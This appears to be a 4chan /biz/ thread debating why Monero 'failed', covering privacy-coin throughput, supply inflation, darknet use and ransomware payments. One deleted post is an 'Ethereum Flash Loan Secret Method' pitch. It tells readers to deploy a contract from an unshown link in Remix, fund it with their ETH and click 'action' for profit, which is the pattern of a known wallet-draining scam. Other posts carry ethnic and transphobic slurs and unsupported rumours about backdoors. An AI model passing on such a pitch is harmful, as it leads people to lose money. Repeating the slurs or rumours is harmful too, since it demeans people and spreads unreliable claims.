Reddit please. You are gambling.

>> No.49848189

Whenever I see Monero I instantly see it as Mon(ey)-Ero(tic) and I just think of Banking porn.

>> No.49848200
File: 405 KB, 716x1083, 1653428732771.png [View same] [iqdb] [saucenao] [google]

>can any of these based private smart contract platforms run cryptokitties without the network blowing up or $500 gas fees?
No, it's not physically possible if you're able to run a node on consumer grade hardware. Assuming it's not a fake Solana-type centralized server garbage, you actually hit a pretty hard wall of hardware limitations if you want decentralized nodes. The 12-13 TPS of Ethereum isn't because they're just a bunch of dummies who don't know how to make it go faster, that's literally as fast as you can go without hitting severe bottlenecking from SSD write-times and/or from bandwidth problems from people trying to keep up with the current state of the network.

As a thought experiment, consider that Monero has roughly an 8x larger average transaction size (in terms of number of bytes) compared to a Bitcoin transaction (~250 bytes versus ~2000 bytes). If Ethereum is hitting a brick wall at 13 FPS using totally open transactions, and (assuming you could add Monero-like privacy to smart contracts with the same efficiency) you made each transaction on average 8x bigger, that means you would be hitting severe bottlenecking problems at 1/8th the traffic.

So in other words these "private smart contract" shitcoins would completely collapse into themselves and hit their breaking point at roughly 2-3 transactions per second. They're fucking totally useless.

The only reason they're shilled is because of jeet marketing groups and because of idiot shitcoiners who don't know what the fuck they are talking about and think reading marketing points on a website is the same as studying distributed systems and cryptography.

>> No.49848393
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>toxic community
not transfriendly enough?

>> No.49848913

Kek, Secret Network just had their mainnet upgrade, bringing 500x improved network performance

>> No.49849242

>500x improvement
Sounds legit brah

>> No.49849867

What would you prefer instead, libertarian MuSkygovernment?

>> No.49850661
File: 515 KB, 220x271, 1621681354191.gif [View same] [iqdb] [saucenao] [google]

>A currency that literally every national government hates is unlikely to succeed in the long run

lol isn't crypto supposed to be permissionless?

>> No.49850747

failed? it's doing exactly what it's supposed to be doing. more than any other coin in the space
ok that utility is buying drugs off dark markets, but it's still utility
go take your trading strategies and shove them up your ass, let people transact anonymously in the real world

>> No.49850821

The secret to crypto is that in most jurisdictions you actually do need permission to not reveal your private keys

>> No.49850846

It is not the name or the brand.
It is the supply, which is infinite. So miners can dump new coins in the market indefinitely, without any limitations to it. There is also no audition, because of the anonymity, so you never know how much the devs are involved into the dumping.

>> No.49852357


>> No.49852502 [DELETED] 

Links to the resources are below.

Remix IDE:

Flash Loan Contract Code:
You're about to find out secret way to make money using the Ethereum Flash Loan Secret Method.

We make use of the flash loan method to self arbitrage on the Ethereum Network.

Flash loans are programmable contracts that we use to acquire loans between two blockchain blocks. This gives us the opportunity to get fee-less to very little fee loans between two block mining time. Only gas fees are paid when executing a flash loan.

This process is easily done by deploying a smart contract on the Ethereum Network via Remix and also swap tokens with UniSwap. All this happens within a single blockchain transaction and the transfer is made automatically using the smart contract.

With the borrowed loan, arbitrage opportunities are evaluated and the transaction is executed. During the mining of the second block, your borrowed money will be refunded and therefore, your loan will be paid.

After all these processes have been successfully executed, the profits of the transaction will be credited to your wallet and you have successfully executed an Ethereum arbitrage.

Flash Loan Contract Deployment

1-Open Remix IDE: http://remix.ethereum.org

2-Create new file and paste the Flash Loan Contract from the link:


3-Set Remix compiler version to 0.5.0 | change environment to Injected Web3.

4-Create your token by filling in the "_TOKENNAME" and "_TOKENSYMBOL" with the loan amount set to 1000.
Click transact to deploy when done.

5-Fund your deployed smart contract address with ETH's you have. (You can withdraw your ETH from smart contract anytime you want.)

6-Lastly, click on "action" to execute arbitrage and you're done.

>> No.49852602

You just don't get it do you? Ppl aren't using Monero for store of value so price fluctuation isn't relevant, they use it for privacy in transactions.

>> No.49852703

Uh oh, based as fuck

>> No.49853686

Monero sounds like money, plus it sounds like a beaner word and there's lots of beaners out there.

>> No.49854543

Monero isn't even listed on coinbase

>> No.49854944

Monero is literally perfect, with a growing user base and can't be shilled by VCs and billionaires looking for a quick pump&dump.
Just healthy slow uptrend

>> No.49855016

Cause they know the Feds ain’t never gonna allow untraceable money for the general public. Only they get to do that.

>> No.49855019

I know, I use it this way as well.
But it can't compete with bitcoin or other alts as a way of making money, because of the reasons I mentioned. There is no mechanism to curb the systematic dumping. You just can't hold monero for a long time, else you lose money.

>> No.49855115

>Why did it fail?
>record amount of daily txs just a few days ago

>> No.49855375
File: 70 KB, 671x1024, neverlivedwithoutasmartphone.jpg [View same] [iqdb] [saucenao] [google]

>what is a non-custodial wallet
>what is actually owning crypto
>what is life without handing over all personal data to corporations

>> No.49855574

Which is why it is counterproductive to ban Monero, as they can easily take advantage of it.

>> No.49855608

Fluffy isn't even the creator of XMR, it was created by one Satoshi-anon and forked by another.

>> No.49855617

Unlimited supply
Connotation with crime
Rubbish logo

>> No.49855927

>Unlimited supply
>Still lower supply than BTC right now.
It's only an unlimited supply over infinite time. For a digital currency, that ensures long term survival. BTC's fixed supply will kill its own market in time.

>> No.49856357

i bought 1500 bucks worth at 20 cents.

>> No.49857339

>infinite supply
>why did it fail
oh shit lol

>> No.49857442

So far, it's the only coin with tokenomics that can work for eternity

>> No.49858383

Exodus. Literally anything except all the shit you mentioned.

>> No.49858401

Please go on sale even more!
t. OP

>> No.49859109

Always thought Monero was a good name, the only problem is that it is long and doesn't have a good abbreviation for everyday use.

>> No.49860123
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Those who have a use case for XMR are on average incentivised to not reveal their power level. This is in stark contrast to most "investment" cryptocurrencies where everybody and their mother want you to know that they are holding the coin and why it is so great.

>> No.49860240

Wow you mean like how fiat works for eternity. Monero works as long as MS keeps putting back doors in their server hardware for botnets to mine xmr with. There are no fucking real devs that will touch Monero with a 10 ft pole now that fluffy dud the perp walk. Your cult of mediocrity and entrapment is fucking annoying.

>> No.49860329
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>I'm going to have an easier, more prosperous life being a good boy, paying my taxes, and following the rules.
Fuck that, seriously.
Why then even have crypto in the first place?
Crypto in general and XMR should be like handguns and rifles that citizens have the right to own in order to keep the government in check. And the government must be forced to begrudgingly accept this or face the consequences!

>> No.49861534

Thats a significant point, hadn't thought of the networking consequences of the "target audience"

Thanks for teaching me something anon

>> No.49862489
File: 42 KB, 645x363, FOJry5UXsAIuTRj.jpg [View same] [iqdb] [saucenao] [google]

Use monero to buy your trap grey market estrogen.

>> No.49862563

Do these markets also sell azunyaan pills?

>> No.49863419
File: 345 KB, 2276x1280, HowToBuyMonero.jpg [View same] [iqdb] [saucenao] [google]

But it works.

Literally, that's it. It works, it's already used as private money.

>> No.49864311

Not all, Monero-only ransom is starting to appear more and more. But the main reason for Bitcoin even being an option is liquidity. It is much easier for a company paying ransom to get 1 or more million USD worth of Bitcoin than the same of Monero. Otherwise, the ransom price is commonly getting marked up if you are to pay in Bitcoin and not Monero, around 20%. That is simply the price for anonymizing Bitcoin.

>> No.49864355

no one has any use for a currency

>> No.49864744

Because the supply is a black box and the devs unquestionably use inflation backdoors to rob you and there's no way to verify it because transactions are secret.

>> No.49864961

I wanna know too

>> No.49864985

sir, would you like to trade your loaf of bread for a 10cm leg part of my goat?

>> No.49865046

The simple answer is most people don't need their transactions to be private. It doesn't matter, they have nothing to hide.

The next biggest problem is useability, what exchanges even list it now. Can I store it on a ledger? It's just hugely inconvenient.

I have almost as good anonymity with zksnarks on eth.

>> No.49865107

you might as well live in a hypersurveillance state that hates you if you're white in the west

>> No.49865638


>> No.49867404

>It actually does literally everything Bitcoin promised to do
except for keeping up with inflation let alone appreciate in real terms.
if i want shit money there is plenty out there.

>> No.49867990

>keeping up with inflation

>> No.49869312

>Literally named MyNigga

>> No.49869622

To the moon!!